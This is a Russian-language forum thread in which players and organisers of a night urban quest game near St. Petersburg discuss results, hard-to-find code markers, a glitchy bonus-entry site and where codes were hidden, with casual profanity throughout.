Просмотреть полную версию : WTF TV 10.11.12
Брифинг в 8:45 у карусели на пулковском шоссе (там же, где был стартовый)
Статистика доступна тут (https://docs.google.com/spreadsheet/pub?key=0AoPnLW92pPCCdGs4NTM1MncwMm1ESFZ2SE5fd0lkU 1E&single=true&gid=1&output=html).
Сценарий доступен тут (http://deadline.en.cx/GameScenario.aspx?gid=39540)
Спасибо, что играли в нашу игру.
Цирк удался гораздо больше. Найди хренпоймисколькокодов с хренпоймикакимко - не лучшее, что можно было придумать. Уровни, котороые сняли 2 из 7 и 0 из 7 команд - атас. Перфаки, говорят, хороши были. Спасибо за старания!
DbSergey
11-11-2012, 09:09
До утреннего брифинга после нашей игры добрались не все. Дублирую сюда то, что на нем было озвучено.
В игре было огромное количество косяков - лично мне кажется, что больше, чем на какой-либо другой игре БДЛ за последние три года. Может быть, мне так кажется потому, что большая часть косяков лежит на моей личной совести - и как человека, работавшего с движком, и как организатора организаторов, и как капитана команды WTF. От лица команды WTF я приношу извинения всем игрокам, которым пришлось столкнуться с последствиями ошибок, допущенных нами при организации этой игры.
Предварительная статистика такова:
7 место: Futurama SPb Team
6 место: Идиоты
5 место: No LimitS
4 место: StreetFuckerZZZ Team
3 место: Вентилятор
2 место: Осторожно, Маньяки!
1 место: CodeBreakers
В статистике не учтено значительное количество бонусов, взятых командами. Окончательная статистика появится в ближайшие 1-2 дня.
Перфаки, говорят, хороши были.
:eek:
Странный
11-11-2012, 10:04
интерны был ничешным уровнем, остальное ...
Нихера не понятно, но за игру спасибо!!
Не ошибается тот, кто ничего не делает! (с)
Имхо:
вообще ничего по сценарию не понятно. Не приятно, когда не понимаешь, что ищешь и там ли вообще ищешь.. Не хорошо, когда не понимаешь, на какой ты из открытых основ.
Итого: взяли на себя много - получилось - .. что получилось..
завтра задам вопросы.
так или иначе, спасибо за игру!! было то, что понра!
спасибо за игру! как-то непонятно...в красном была какая-то движушка, катались лазали искали.....потом колпино - самый адовый отрезок....потом хорошее начало в пушкине, и ужасное окончание в павловске.
Понравился уровень ИНТЕРНЫ, интересно и весело побегать, и агенты умнички)
Не понравились, как отписаны многие коды и метки, отсутствие напрявляшек на локах убивало простои хз скока частей на локе...и все ли ты нашел.
Ну и ессно 5 ко3 на уровне это перебор, как мне кажется, тем более последним уровнем.
Расскажите про уровень перехват, у нас игрок минут 15 стоял на перекрестке тормозя проезжающие машины...но лисы небыло.
Ну и логику уровня прогноз погоды заодно расскажите.
Предварительная статистика такова:
7 место: Futurama SPb Team
6 место: Идиоты
5 место: No LimitS
4 место: StreetFuckerZZZ Team
3 место: Вентилятор
2 место: Осторожно, Маньяки!
1 место: CodeBreakers
В статистике не учтено значительное количество бонусов, взятых командами. Окончательная статистика появится в ближайшие 1-2 дня.
На секунду показалось, что Футурама победила, а КодБрейкерз на последнем
DEd_MONro
11-11-2012, 13:06
"Расскажите про уровень перехват, у нас игрок минут 15 стоял на перекрестке тормозя проезжающие машины...но лисы небыло."
мы сразу вбили номер нашего авто и у нас прошло)))
Понравились локи с вертолетами и съемочной площадкой и задание интерны.
Можно было зомбиленд весь поднапрячь на поиск розеток)))
Где был код на втором вертолете?
"Расскажите про уровень перехват, у нас игрок минут 15 стоял на перекрестке тормозя проезжающие машины...но лисы небыло."
мы сразу вбили номер нашего авто и у нас прошло)))
Номер авто - это "Ищу тебя" было, а перехват - это Колпино
III007III
11-11-2012, 13:50
Уважаемые организаторы, а будут фотографии мест расположения кодов на уровнях и бонусах? А на некоторых еще и расположение конечных меток : D
tigrro4ka
11-11-2012, 14:39
Зачем, зачем вы придумали отдельный движооок для рекламных слоганов????
игра....была. даже бодрая, при этом совершенно разнозненные уровни, куча бонусов, отсутствие информации о количествах кодов, КО, зеленые метки на зеленом фоне, метки, размером меньше кода.
понравились Интерны. понравился уровень про фильм про войну.
остальное сумбур, разброд и шатания.
Движок с рекламами - это полный пиздец!
5 кодов КО3 на уровень, тем более когда он самый последний в 7 утра - второй полный пиздец!
как-то так
"Расскажите про уровень перехват, у нас игрок минут 15 стоял на перекрестке тормозя проезжающие машины...но лисы небыло."
мы сразу вбили номер нашего авто и у нас прошло)))
Понравились локи с вертолетами и съемочной площадкой и задание интерны.
Можно было зомбиленд весь поднапрячь на поиск розеток)))
Где был код на втором вертолете?
один код сразу при залазе слева ми82, а второй в кабине пилота. залезаешь в кабину и по левую руку в так сказать полуящичке...надо было пригнуцо и прочитать- пилот3, если не ошибаюсь.
было два варианта на игре:
приезжаешь - быстро снимаешь - уезжаешь.
приезжаешь - дооооооооолго ищешь конечки - материшься - сливаешь.
П.С и это, выгоните меня из ко3шнегов. я стал стар для этого))
nadlooshi
11-11-2012, 16:08
Мне из штаба не зашло, простите.
Причем я даже понимала иногда, что от нас хотят. Понимала, что хотели сделать авторы. Но..
Бонусный движок... зачем?!) Добавление еще одного уровня в штурмовую последовательность решило бы все проблемы, а в итоге вы и сами заморочились, и половину штабов довели до нервного дерганья глаз. Автообновление будет гореть в аду.
Задания понравились, но как-то по отдельности... в целую картинку так и не сложились (а была ли она?).
А еще круто, что по движку ни одна команда так и не финишировала... будете доводить или ну нафиг?
В общем, как писали выше, игра была. Спасибо хотя бы за это.
system error
11-11-2012, 17:54
Спасибо за игру, хотя "косячков" было много.
Пока нету статистики с комментариями - только один вопрос
КТО сказал что эта наклейка легко отдирается ? . Прилипла к стеклу так, что не отодрать.
Набросились-то )))
Спасибо за игру! Что понравилось мне в этой игре - формат, обеспечивающий постоянную движуху (очень это понравилось еще в news agency от CB), перфаки и агентские уровни на которых мы были - шашки, такси с обаятельным таксистом, интерны - отличный уровень - агенты, задумка, реализация, место - супер! Вообще теперь это место четко ассоциируется с отличными перфаками (привет Палтусу!). Даже перехват, который мы, скорее всего, сами протупили, был забавный!
Понравился поисковый уровень в особняке в Красном, жаль, что пришлось снимать уровень.
Очень понравились вертолеты - зачетное место. Антуражности добавили наставления агента - Инкубуса - "заметите свет фонаря охраны, падайте в траву - начнут стрелять, не зацепит" :D. Дорогу освещал нам нарождающийся месяц, коды искали на ощупь :D.
Несмотря на все косяки, игра точно не была "самой косячной за последние 3 года". Что было в этой игре важно для меня - видно, что в игру вложено много сил и души, как и цирк, вы очень старались сделать игру для игроков. Это чувствовалось! Спасибо!
Игра понравилась. Первую зону ничего не понимал (у нас она была в Колпино), а потом было более понятно и стало интересно- Интерны, вертолеты, такси и так далее. ну и вышки, конечно. Площадка Ленфильма тоже заслуживает отдельного внимания, хотя хотелось, чтобы она была заиграна как-то по-интереснее.
В общем порадовало. Спасибо!
Видно нашему экипажу повезло, косяков особых не заметил.
желаю гореть в топографическом аду автору шифровки таксиста.где черти будут 35 раз в секунду возить носом по карте в поисках истинного расположения м11.задания тестировать надо,да.
Спасибо за игру! Понравилась. Постоянная движуха, на месте не стояли, это очевидный плюс! Агентам с уровня "Интерны" респектище (уже передавал, но не могу не написать еще раз), вы просто молодцы, что это придумали и создали!!!!! Заипались мы там бегать конечно, но оно того стоило:) бедная печень, она столько раз умирала:D Вертолеты просто офигетительные, это факт! На ТЭЦ в Павловске, на мой взгляд, надо было либо давать больше времени, либо упрощать, потому что вписаться в норматив очень сложно, ибо там сначала надо пускать экипаж коодишников для поиска меток, а потом экипаж котришников, чтобы брать коды.
Спасибо за игру! сначала надо пускать экипаж коодишников для поиска меток,
Метки на игре это отдельная "песня". Зеленым по зеленому и серебром по белому! :D Пару раз находили код, а уж потом метку ))
natashkO
11-11-2012, 22:34
Спасибо всем, кто играл в нашу игру! Мы очень старались, но, к сожалению, не все получилось.
Понравился поисковый уровень в особняке в Красном, жаль, что пришлось снимать уровень.
Это проклятый уровень. Он переезжал по пяти локациям - одну снесли, вторая внезапно населилась людьми, третья тоже оказалась полурабочей, с четвертой во время прописки нас выгнал участковый, в итоге коттедж мы прописывали в ночь перед игрой, но и он не сыграл(
Спасибо Брейкерам за позитивное настроение во время игры, с вами было невероятно приятно общаться!;)
КТО сказал что эта наклейка легко отдирается ? . Прилипла к стеклу так, что не отодрать.
А кто такое говорил?
На самом деле, стандартная вениловая наклейка. У меня на то, чтобы ее отклеить ушло минут 15. =)
А вот как Валера будет ее отклеивать со своей вениловой пленки... вот это вопрос. =))
Спасибо всем, кто играл в нашу игру! Мы очень старались, но, к сожалению, не все получилось.
Это проклятый уровень. Он переезжал по пяти локациям - одну снесли, вторая внезапно населилась людьми, третья тоже оказалась полурабочей, с четвертой во время прописки нас выгнал участковый, в итоге коттедж мы прописывали в ночь перед игрой, но и он не сыграл(
Спасибо Брейкерам за позитивное настроение во время игры, с вами было невероятно приятно общаться!;)
расскажи хоть, где был код на чердаке у окна с синей меткой...
Just_Vinny
11-11-2012, 22:41
а мне понравилось. очень давно пытался подобраться к ленфильму, особенно в последнее время. вертолеты- просто сказка. на интернов нас не занесло, но ТРГшники ща рассказывали что было очень круто. обычно очень забавно бегать по локе, когда на тебя зомби кидаются)
не понял в некоторых местах чем двойки отличались от троек, а еще направляшкам- быть!!! не спасибо за поиск в понтонном. большое человеческое не спасибо. код на 15-20 символов золотым маркером по ржавчине- это круто... как его брать если на локе еще команда?
Cпасибо за игру. К сожалению, она не понравилась. Нам показалось, что подзоны были совершенно неравноценны по сложности - Колпино показалось самой сложной. Совершенно не понравился стиль и способы написания кодов и меток. Ну неужели так сложно было пользоваться черными и другими более видимыми цветами? К концу игры было уже даже смешно, когда из 6 кодов могли найти только 4 метки. Очень хотим знать, где были написаны коды и видеть их фотки водонапорках в пос. Саперный. Вообщем, цирк был гораздо круче )
А кто такое говорил?
На самом деле, стандартная вениловая наклейка. У меня на то, чтобы ее отклеить ушло минут 15. =)
А вот как Валера будет ее отклеивать со своей вениловой пленки... вот это вопрос. =))
видима никак) будет с ней ездить...
На брифе говорили, что "только не клейте на кузов, со стекла сдирается, как 2 пальца"
На брифе говорили, что "только не клейте на кузов, со стекла сдирается, как 2 пальца"
Все верно, со стекла, отклеивается отлично, минут за 15. =)
natashkO
11-11-2012, 22:52
расскажи хоть, где был код на чердаке у окна с синей меткой...
Переадресовала вопрос Майку - чердак он писал)
Переадресовала вопрос Майку - чердак он писал)
угу, пообщался...оказывается я слепой, ибо там сразу искал, не нашел))
Pukkaras
11-11-2012, 23:20
феном подуйте на наклейку, отойдет легко и быстро. Наверное и с пленки на кузове так можно отклеить, если аккуратно.
А вот как Валера будет ее отклеивать со своей вениловой пленки... вот это вопрос. =))
Была бы чОрная, так бы и ездил)
А так да, парни, которые меня обклеивали, пользуются феном для того чтобы снять свои художества.
Кстати по игре. Вроде было ничего, сами пипец как тупили, но не понравилось. То ли из аз косяков, то ли из аз стиля кодов, то ли еще из за чего, фиг знает. Думаю нужно почитать статистику и комментить.
феном подуйте на наклейку, отойдет легко и быстро. Наверное и с пленки на кузове так можно отклеить, если аккуратно.
вместе с пленкой...
DEd_MONro
12-11-2012, 00:14
один код сразу при залазе слева ми82, а второй в кабине пилота. залезаешь в кабину и по левую руку в так сказать полуящичке...надо было пригнуцо и прочитать- пилот3, если не ошибаюсь.
Как раз эти 2 взяли почти мгновенно. Где был 3й???
Just_Vinny
12-11-2012, 01:22
Как раз эти 2 взяли почти мгновенно. Где был 3й???
на другом был, в щитке, голубым маркером
DEd_MONro
12-11-2012, 02:08
на другом был, в щитке, голубым маркером
Внутри самолета? просто внешне мы меток не видели кроме непонятной стрелки на носу
Внутри самолета? просто внешне мы меток не видели кроме непонятной стрелки на носу
второй вертолет, идешь по стрелке, там конечная метка. рядом крышка. открываешь. код
Как раз эти 2 взяли почти мгновенно. Где был 3й???
я в это время ангар снимал))
Just_Vinny
12-11-2012, 09:05
второй вертолет, идешь по стрелке, там конечная метка. рядом крышка. открываешь. код
:eek::eek: стрелка, конечка? не встречалось.
Book'Sir
12-11-2012, 09:16
Спасибо за игру, игра зашла рывками... то густо, то пусто... обрадовал нон-стоп, не понял концепта, но это вполне могут быть мои проблемы :) стоит отметить, что я, хоть и отыграл всего 1 сезон суммарно, но на этой игре наткнулся на 2 длясебяужебояна :) вот по поводу одного из них и хотелось спросить... Котельная в Пушкине, 2 кода: КО1 и КО3 - трешку взял очень быстро, а вот с этойгребанойединичкой мы пролазали там хзскольковремени((( скажите, плиииииииз, где был код или метка хотябы... гы, и Ольчик +1 ибо тоже находили коды раньше меток)))
Спасибо за игру! Очень радует, что Дедлайн остался единственным проектом, где за одну игру могут заигрываться 30,40,50 и даже 60+ локаций. Прописывание кодов было "моим", поэтому в конечном итоге забил искать конечные метки, так как коды все равно находились раньше) Трешек было больше, чем достаточно - мы с Марком конкретно подзаебались... их снимать, спасибо))
Конечно, уровень "Интерны" можно смело ставить в соответствующую номинацию: и агрегат классный, и реализация, и бег по зданию, и агенты)
Несомненный плюс, что никто практически не стоял - все постоянно что-то брали, покурить особо времени не было.
Вертолеты тоже хороши - на Форсаже побоялись их заигрывать, все-таки действующий военный объект.
Ну и хотелось бы отметить огромную работу, которую вы, ребята, провели.
Но... чувствуется, что не хватило какой-то недели: дотестить, допроверить, доделать. Сняли бы по одному уровню с каждой подзоны - и все бы было просто замечательно)
О минусах:
1) Как обычно, прибегаешь на локацию, видишь входную метку дозора. Начинаешь искать входную метку Дла, по пути находишь все направялшки дозора, все конечки дозора, всекоды дозора... потом находишь входную метку ДЛа) Ну реально, чем больше направляшек и чем однозначней и виднее конечки - тем больше вам будет благодарности от игроков. А То в коттежде в СНТ "Красногорское" конечка была просто адовая - на черном граффити, маленькая зелененькая)
2) Не понятен формат, вот честно. От него увидел один минус - статистика в движке абсолютно непоказательна. Конечно, он вписывался формат в концепцию "телепередач", но мне кажется без него можно было обойтись обычной нелинейкой.
3) Очень надеюсь, что расскажете подробную методику расчета окончательной статистики. И мне кажется (и это вижу реальным минусом в организации), эту методику надо было раскрыть до самой игры: думаю, команды многие пересмотрели свои стратегии. А так пока хрен поймешь: вроде закрыли уровней больше других, а по факту - только четвертые.
Вопрос: где был код на мосту в Балканы?
P.S. Ваня, наши с тобой карты боянов совпадают полностью:D
Спасибо за игру, не без косяков, конечно, но я бы не назвала ее "худшей игрой за последние три года", Сереж, не наговаривай на себя.
На самом деле основной проблемой, по крайней мере для нас, стала катастрофическая нехватка времени на выполнение уровня - сперва ищешь метки, потом коды, потом еще куришь то, что нашел... Как-то странно, с учетом того, что игра тестилась.
Спасибо командам, которые были на локах до нас и отмечали взятые коды нормальными маркерами - ваши метки позволяли нам найти метки оргов )))
Пожалуй, первый раз на игре я сперва нашла код ДЗР, а потом уже наш... обычно наши коды находились быстрее.
А вообще жаль, что так получилось - видно, что в игру было вложено много сил и души, но не сложилось.
И отдельное СПАСИБО за Сталинград!!!! Это охрененно. Амакан - супер. Луна, развалины, подбитый немец, чумадан с доками. Родина вас не забудет!
:eek::eek: стрелка, конечка? не встречалось.
ближе к остаткам хвоста
сперва ищешь метки, потом коды, потом еще куришь то, что нашел...
Надо было забить искать метки - так как раз получалось то, что надо по времени :D:D:D
Надо было забить искать метки - так как раз получалось то, что надо по времени :D:D:D
это для таких как ты, у которых логика с оргами совпадала :)
а так - ни меток, ни кода :D
Надо было забить искать метки - так как раз получалось то, что надо по времени :D:D:D
К сожалению, абсолютно не моя прописка (( Меток я вообще не видела, с кодами было чуток получше, но тоже не всегда.
Кстати, у какой команды метка - глаз в треугольнике?
Кстати, у какой команды метка - глаз в треугольнике?
Зеленоглазые.
Слушайте, а чего за бонусный движок был?
Зеленоглазые.
Спасибо зеленоглазым за метки в ангаре в Пушкине, уровень мы слили, но искать было проще.
Спасибо зеленоглазым за метки в ангаре в Пушкине, уровень мы слили, но искать было проще.
я так понимаю, его все слили ))) Еще ЕВРО хорошо был виден - спасибо за хорошую отписку, а вот Идиотские метки - не очень :D
Слушайте, а чего за бонусный движок был?
был отдельный сайт для ввода рекламных слоганов. очень глючная штука, перекидывал вверх страницы, не отображал, что уже ввели, давал зайти только одному человеку, некоторые слоганы проходили только с пробелом в конце и т.д. в общем у нас был отдельный человек, который мучался с ним полночи
был отдельный сайт для ввода рекламных слоганов. очень глючная штука, перекидывал вверх страницы, не отображал, что уже ввели, давал зайти только одному человеку, некоторые слоганы проходили только с пробелом в конце и т.д. в общем у нас был отдельный человек, который мучался с ним полночи
а еще адовое автообновление, когда ввел половину фразы, и хренакс, все обновилось. Ад и Израиль короче.
а еще адовое автообновление, когда ввел половину фразы, и хренакс, все обновилось. Ад и Израиль короче.
я главное не поняла зачем его так реализовали. вот честно лучше б ответы по почте принимали, как и фотобонус :D
а вот Идиотские метки - не очень :D
Приношу извинения от себя лично и от команды Идиоты, обязательно учтем данное замечание, и в будущем постараемся ставить более заметные метки :p
Спасибо зеленоглазым за метки в ангаре в Пушкине, уровень мы слили, но искать было проще.
ггг, так они же не играли) , я думал вопрос про метки с их игры (у них в той же зоне была). а так хз чьи)
ггг, так они же не играли) , я думал вопрос про метки с их игры (у них в той же зоне была). а так хз чьи)
Не, я про метки команды с этой игры. Была розовая бесконечность, было еще что-то, но легче всего находился глаз в треугольнике )
III007III
12-11-2012, 11:24
глаз в треугольнике )
Вот как вы там глаз-то разглядывали????
я главное не поняла зачем его так реализовали. вот честно лучше б ответы по почте принимали, как и фотобонус :D
так в итоге вроде ж так и принимали?
а вообще, еще один уровень в энкодвижке - и ноупроблем!
Velkopiterskij
12-11-2012, 11:33
а еще адовое автообновление, когда ввел половину фразы, и хренакс, все обновилось. Ад и Израиль короче.
Две мясных котлеты гриль?)))
так в итоге вроде ж так и принимали?
а вообще, еще один уровень в энкодвижке - и ноупроблем!
возможно, тем человеком, который с ним у нас в итоге до конца разбирался была не я :D
Вот как вы там глаз-то разглядывали????
Вообще я считала, что это глаз в пирамиде, как на долларовых купюрах, но мне тут подсказывают, что это просто круг в треугольнике )))
В любом случае, спс, ваши метки у меня искались как никакие другие.
За игру спасибо!
Формат отличный!
Нам очень не хватало полевиков, играть в 9 человек - ад (а собирались вообще в пятером выходить). Задания вполне курились из поля, но их было много и в середине уже слабо соображалось, что где и как... Второй экипаж даже ухитрился снимать уровень, который уже слили..
На перфаки к сожалению наш экипаж не попадал, расскажите хоть, что за уровень интерны?
Про метки уже все сказали, коды находились до меток, а под конец игры не замечались черные метки на белом, тк глаза от таких за игру отвыкли)))
У меня вопрос по уровню с рекламным щитом на ЮЗ, расскажите, плиз, полностью логику всего уровня.
Понравилось задание с адресами баянов, но и в тот же момент вопрос, а как его раскурить людям, которые играют первый раз?
чота статы и сценария хз когда ждать, расскажите хоть тут логику уровня "прогноз погоды".
чота статы и сценария хз когда ждать, расскажите хоть тут логику уровня "прогноз погоды".
все будет в сценарии. Он скоро будет готов.
cпасибо за игру, формат отличный. Хотелось бы фото, где были прописаны коды. А времени нам, все таки, маловато было. :rolleyes:
DEd_MONro
12-11-2012, 12:56
:eek::eek: стрелка, конечка? не встречалось.
+100500!!!
Мы впятером это вертолет вылизывали
все будет в сценарии. Он скоро будет готов.
Скоро - понятие растяжимое. Сегодня? Завтра? Утром? Вечером?
III007III
12-11-2012, 13:17
все будет в сценарии.
Фотографии кодов и меток будут? =)
Фотографии кодов и меток будут? =)
вас интересуют ВСЕ уровни или какие-то конкретные?
III007III
12-11-2012, 13:25
вас интересуют ВСЕ уровни или какие-то конкретные?
Меня лично интересуют: ангар в Пушкине всеми слитый, вышки в Саперном и здание рядом котельной не помню где, но в этой подзоне(тут мы из 6 меток только 4 найти смогли:D)
Velkopiterskij
12-11-2012, 13:28
Меня лично интересуют: ангар в Пушкине всеми слитый, вышки в Саперном и здание рядом котельной не помню где, но в этой подзоне(тут мы из 6 меток только 4 найти смогли:D)
Южная 5?
вас интересуют ВСЕ уровни или какие-то конкретные?
выкладывай все, не промахнешься и удовлетворишь всех сразу:D
а еще адовое автообновление, когда ввел половину фразы, и хренакс, все обновилось. Ад и Израиль короче.Две мясных котлеты гриль?)))
Я половину слоганов писал в блокноте, а потом оттуда копипастил в движок... в разных вариантах... Кстати, так и не понял, как правильно пишется слоган "Жиллет"... ) Ах да, и "Фантастика"... )
III007III
12-11-2012, 13:34
Южная 5?
оно =)
Меня лично интересуют: ангар в Пушкине всеми слитый, вышки в Саперном и здание рядом котельной не помню где, но в этой подзоне(тут мы из 6 меток только 4 найти смогли:D)
я только три видел)) и 1 код нашли..
Я половину слоганов писал в блокноте, а потом оттуда копипастил в движок... в разных вариантах... Кстати, так и не понял, как правильно пишется слоган "Жиллет"... ) Ах да, и "Фантастика"... )
у меня прошло как Жилетт
Book'Sir
12-11-2012, 13:49
вас интересуют ВСЕ уровни или какие-то конкретные?
котельная в Пушкине код КО1 ... хоть на каком этаже был????
котельная в Пушкине код КО1 ... хоть на каком этаже был????
На первом. Ближайший котел к двери. На кирпиче слева чуть выше головы с внутренней стороны котла
чуть не забыла, не сказано, благодарны за найденный и в полной сохранности отданный бумажник :rolleyes:
Book'Sir
12-11-2012, 14:21
На первом. Ближайший котел к двери. На кирпиче слева чуть выше головы с внутренней стороны котла
Спасибо, любезный (куярется башкой от стол)
DbSergey
12-11-2012, 15:07
...вышки в Саперном...
О каких именно вышках идет речь?
DrevoReZ
12-11-2012, 16:54
Меня лично интересуют: ангар в Пушкине всеми слитый, вышки в Саперном и здание рядом котельной не помню где, но в этой подзоне(тут мы из 6 меток только 4 найти смогли:D)
Напишу со стороны нашей команды. Ангар в Пушкине - нашли 20 кодов, но с полелогикой не успели разобраться. Зеленые метки плохо видны, но все в итоге нашли.
Вышки в Саперном это кирпичный высокий баян? Там еще белая конечка была. Если на нее смотреть, справа сверху видна двутавровая балка. Нужно вывеситься из окна, держась за балку, подтянуться и увидеть код. Взяли быстро.
Здание рядом с котельной (Южная 5) - нашли 3 метки и 2 кода. Один в 2 слова, другой в 3 слова. Формат итогового кода был - 6 слов и мы расчитывали, что нам нужно найти последний и закрыть уровень, но сделать этого не смогли. Возможно это был тот самый код ко1, потому как двушку и трешку мы сняли.
Здание рядом с котельной (Южная 5) - нашли 3 метки и 2 кода. Один в 2 слова, другой в 3 слова. Формат итогового кода был - 6 слов и мы расчитывали, что нам нужно найти последний и закрыть уровень, но сделать этого не смогли. Возможно это был тот самый код ко1, потому как двушку и трешку мы сняли.
Кодов было 6, все были из 3-х слов. 1 код был на первом этаже, все остальные на втором.
На первом этаже: на стене направляшка-стрелка наверх, метка на бетонном выступе под потолком, код рядом с меткой на балке. Прописывали, спустившись через дырку в полу второго этажа.
На втором этаже: 2 кода в центре здания, лезть по балкам. 1 код на периле, конечка к нему напротив на стене. 1 код в самой дальней комнате - тупо посередине стены написан, конечка к нему в коридоре, с обратной стороны той самой стенки, на которой он написан. 1 код в одной из комнат посередине. над окном на бетонной балке конечная метка, сам код левее и выше.
Кодов было 6, все были из 3-х слов. 1 код был на первом этаже, все остальные на втором.
На первом этаже: на стене направляшка-стрелка наверх, метка на бетонном выступе под потолком, код рядом с меткой на балке. Прописывали, спустившись через дырку в полу второго этажа.
На втором этаже: 2 кода в центре здания, лезть по балкам. 1 код на периле, конечка к нему напротив на стене. 1 код в самой дальней комнате - тупо посередине стены написан, конечка к нему в коридоре, с обратной стороны той самой стенки, на которой он написан. 1 код в одной из комнат посередине. над окном на бетонной балке конечная метка, сам код левее и выше.
у нас была мысль, что надо лезть через дырку, но я не пустила Ягу, ну нахрен такое адиво.
я правильно поняла, что к 6ти кодам было всего 4 метки?
я правильно поняла, что к 6ти кодам было всего 4 метки?
Нет, конечные метки были ко всем кодам.
DrevoReZ
12-11-2012, 17:48
Спасибо за игру, орги молодцы. 15 основных заданий, 15 вышек, около 15 бонусов в зонах. Основные задания не для 1 человека, а минимум для экипажа. Формат, в котором экипажи не стоят. Вот это действительно многоэкипажная игра, за что оргам большое спасибо!
По тому, где и как были прописаны коды, эмоции крайне положительные, по тому, чем были прописаны коды, отрицательные (маленькие зеленые, либо сиреневые конечки и направляхи не видны).
Большое количество интересных идей на игре, в особенности идей для поисковых уровней.
Косяков конечно было много, тут либо уже перечислили, либо еще перечислят, но мне вот в такую многоэкипажную игру в разы приятнее играть, чем в бескосячную игру, где половину людей в команде увидят 2-3 уровня, из которых 50% берется одним человеком. В общем, делайте игры еще!
Кодов было 6, все были из 3-х слов.
Добавлен новый цвет маркера в список лютой ненависти :D
Ну и ессно 5 ко3 на уровне это перебор, как мне кажется, тем более
На двух ко3+ кодах нельзя было допустить пересечение команд, поэтому так и получилось. Но это еще спорный вопрос, что хуже: тэц последним заданием или самая сложная зона - Колпино в конце.
Уважаемые организаторы, я правильно понимаю, что в снятых уровнях командам приходили коды закрытия? То есть у команд было время снимать бонусы и посылать дополнительные экипажи на предыдущие задания? Меня одного терзают смутные сомнения, что это нихуя не равные условия на штурмовой игре?
На мультфильм пришел код закрытия. На Угадай мелодию - только надпись в движке от оргов. Что по сути дела одно и то же.
На мультфильм пришел код закрытия. На Угадай мелодию - только надпись в движке от оргов. Что по сути дела одно и то же.
Угадай мелодию мы брали в то время, как его закрыли. Так что время потратили.
III007III
12-11-2012, 19:15
Угадай мелодию мы брали в то время, как его закрыли. Так что время потратили.
а как мы расстраивались что запалили вам второй дом, тк о его существовании сами узнали за 5 минут до слива:D
А я думал что пиццерия пидорасы только привезли пиццу и сразу суки спам про такси шлют
Спасибо, что играли в нашу игру!
Спасибо за отзывы (положительные и отрицательные).
Приношу извинения команде SFZ за то, что им пришлось "пообщаться" с правоохранительными органами на уровне "Фильм о войне". Оказалось данную заправку недавно грабили и тетеньки очень к концу ночи перепугались бесчисленного количества экипажей.
Кстати, SFZ, мне очень понравилось, как ваш экипаж вел себя на уровне: тихо прошли, быстро и бесшумно взяли, также тихо ушли.
А вообще всем командам огромное спасибо! Понравилось, что все шли спокойно без фонариков.
А я думал что пиццерия пидорасы только привезли пиццу и сразу суки спам про такси шлют
Да-да... Причем сразу на оба КЦшных телефона... :D:D:D
tigrro4ka
12-11-2012, 19:58
А я думал что пиццерия пидорасы только привезли пиццу и сразу суки спам про такси шлют
угу. мы их эпично удалили )))
Вообще огромное спасибо авторам за мои любимейшие подъёбки(в стиле кодов в мячиках на царе): спам такси, номера машин, Идиоты после нескольких кругов "взяли" в итоге собственную машину (катал 1 экипаж)
Логика не на подумать, а на сообразить (%
prinncessa
12-11-2012, 21:41
Вообще огромное спасибо авторам за мои любимейшие подъёбки(в стиле кодов в мячиках на царе): спам такси, номера машин, Идиоты после нескольких кругов "взяли" в итоге собственную машину (катал 1 экипаж)
Логика не на подумать, а на сообразить (%
боюсь представить чья машина у нас прошла-)
"уже вторник вообще-то" (с)
где стата? где сценарий?
Velkopiterskij
13-11-2012, 10:29
"уже вторник вообще-то" (с)
где стата? где сценарий?
Ещё сутки ж почти есть у оргов по правилам.
Ещё сутки ж почти есть у оргов по правилам.
знаю :) но подгонять-то по правилам не запрещено :D
Мне кажется вопрос не столько в стате, сколько в сценарии, который должен дать ответы на вопросы. Вчера обещали, что сценарий вот-вот откроют, поэтому на форуме отвечать не будут.
Вот-вот, на мой взгляд, уже прошел. А стату да, еще чуть меньше суток.
aleksgon
13-11-2012, 11:17
Спасибо за игру. Спасибо маньякам, что дали возможность присоединиться)
А как там поживает статистика?
DbSergey
14-11-2012, 02:40
Статистика посчитана и доступна тут (https://docs.google.com/spreadsheet/pub?key=0AoPnLW92pPCCdGs4NTM1MncwMm1ESFZ2SE5fd0lkU 1E&single=true&gid=1&output=html).
Сценарий доступен тут (http://deadline.en.cx/GameScenario.aspx?gid=39540).
Насколько я понимаю, мониторинг открывается в тот момент, когда начисляются очки. Если так, просьба капитанам откорректировать составы до середины дня 14 ноября (15:00). Если нет, подскажите пожалуйста, как открыть мониторинг до начисления очков.
Срок подачи апелляций - до 2:40 ночи 15 ноября.
Ах ты ж ёбаный ты нахуй! Я тока щас понял, как этот формат в движке выглядел. Вы - красавчики и адовые задроты! При таких раскладах, кстати, накосячить в разы проще.
*ушел перекраивать уровни*
Теперь понятно, кто у вас танковый задрот. В КЦ, конечно, нашли сайт, "в котором все эти уточки и кучки говна с картинки имели номер" (с), но даже совместными усилиями определить их нам не удалось...
Очень понравился уровень "Интерны", отличная идея для заигрывания бояна, только интересно, реально всё же было пронести бокс из точки 4 в точку 5 как положено, по внутренней лестнице, а не по внешней, как это сделали мы? Мне показалось, что это невозможно. Но всё равно спасибо, оч клёвый уровень.
В остальном, где мы были, - бояны, как локи, так и задания. Вам бы реально еще недельку на подготовку...
меня одного смущают уровни, которые брейкеры взяли за 6 мин и за 2 мин???
либо я сллепой, либо я не увидел компенсацию за уровень мультфильмы нам?
Теперь понятно, кто у вас танковый задрот. В КЦ, конечно, нашли сайт, "в котором все эти уточки и кучки говна с картинки имели номер" (с), но даже совместными усилиями определить их нам не удалось...
Очень понравился уровень "Интерны", отличная идея для заигрывания бояна, только интересно, реально всё же было пронести бокс из точки 4 в точку 5 как положено, по внутренней лестнице, а не по внешней, как это сделали мы? Мне показалось, что это невозможно. Но всё равно спасибо, оч клёвый уровень.
В остальном, где мы были, - бояны, как локи, так и задания. Вам бы реально еще недельку на подготовку...
реально, я пробежал)
Velkopiterskij
14-11-2012, 09:20
меня одного смущают уровни, которые брейкеры взяли за 6 мин и за 2 мин???
либо я сллепой, либо я не увидел компенсацию за уровень мультфильмы нам?
Как я понимаю уровень "за стеклом" берётся за 6 минут если заранее выслать экипаж из Пушкина в Красное Село. Спалить место очень легко. Так как в задании указан и номер дома и улица, то "поехать проверить" именно их ничего не мешает. Дальше вопрос лишь в том насколько реально взять на месте за 3-4 минуты.
Про задание "ищу тебя" , то вполне реально за 2 минуты сделать вывод, что не просто так и наклейки клеили и номера собирали с машин и попробовать ввести в качестве кода какой-то из своих номеров.
А ещё у меня вопрос к организаторам по поводу уровня "прогоноз погоды". Это только у нас само задание было изначально недопрописано?
Я все еще жду ответ организаторов на свой вопрос с предыдущей страницы. Мне не стоит ждать?
